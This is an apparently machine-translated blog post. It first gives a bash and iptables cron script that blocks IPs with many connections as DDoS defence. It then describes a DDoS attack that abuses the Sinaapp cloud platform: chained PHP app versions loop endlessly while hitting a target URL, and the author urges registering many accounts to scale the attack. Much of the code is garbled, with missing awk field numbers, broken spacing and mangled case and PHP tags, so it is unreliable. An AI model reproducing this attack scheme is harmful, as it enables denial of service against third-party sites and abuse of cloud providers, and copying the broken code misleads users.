The server is DDoS attack Defense shell script
1. Scripting
Mkdir/root/bin
vi/root/bin/dropip.sh
#!/bin/bash
/bin/netstat-na|grep Established|awk ' {print $} ' |awk-f: ' {print $} ' |sort|uniq-c|sort-rn|head-10|grep-v-e ' 192.168 |127.0′|awk ' {if ($2!=null && $1>4) {print $}} ' >/tmp/dropip
For I in $ (CAT/TMP/DROPIP)
Todo
/sbin/iptables-a input-s $i-j DROP
echo "$i kill at ' Date '" >>/var/log/ddos
Done
2. Increased executive authority
chmod +x/root/bin/dropip.sh
3. Add to scheduled task, execute once per minute
Crontab-e
*/1 * * * */root/bin/dropip.sh
Description
The most important is the second line, which gets the top 10 IP established connections and writes the temporary file/tmp/dropip, excluding the internal IP segment 192.168| 127.0. Through the For loop, the IP inside the DROPIP is dropped all through the iptables and then written to the log file/var/log/ddos
Another way is to use PHP to write DDoS attacks, using other cloud platforms to operate
The main use of Sinaapp as a test object.
Test idea: Create 4 versions of the app.
Version 1 home code is as follows:
<php
file_get_contents (' http://2.mars.sinaapp.com/');//version 1 triggers attack (Access version 2)
>
Version 2 Home code:
<php
file_get_contents (' http://www.xxx.com/ip.php ')://Attack target
file_get_contents (' http://3.mars.sinaapp.com/');//Access version 3
>
Version 3 Home code:
<php
For ($i =1 $<=10; $i + +) {//Here's an evil, a few more effects better
file_get_contents (' http://www.xxx.com/ip.php ');
file_get_contents (' http://4.mars.sinaapp.com/'); }
>
Version 4 home code:
<php
file_get_contents (' http://2.mars.sinaapp.com/');//Access version 2, resulting in a dead loop
>
These are the steps to use a Sinaapp user to exploit, expand yourself, register a large number of users, and create more versions to attack. But in the testing process, each app actually has two IP exits. It is better to use multiple users.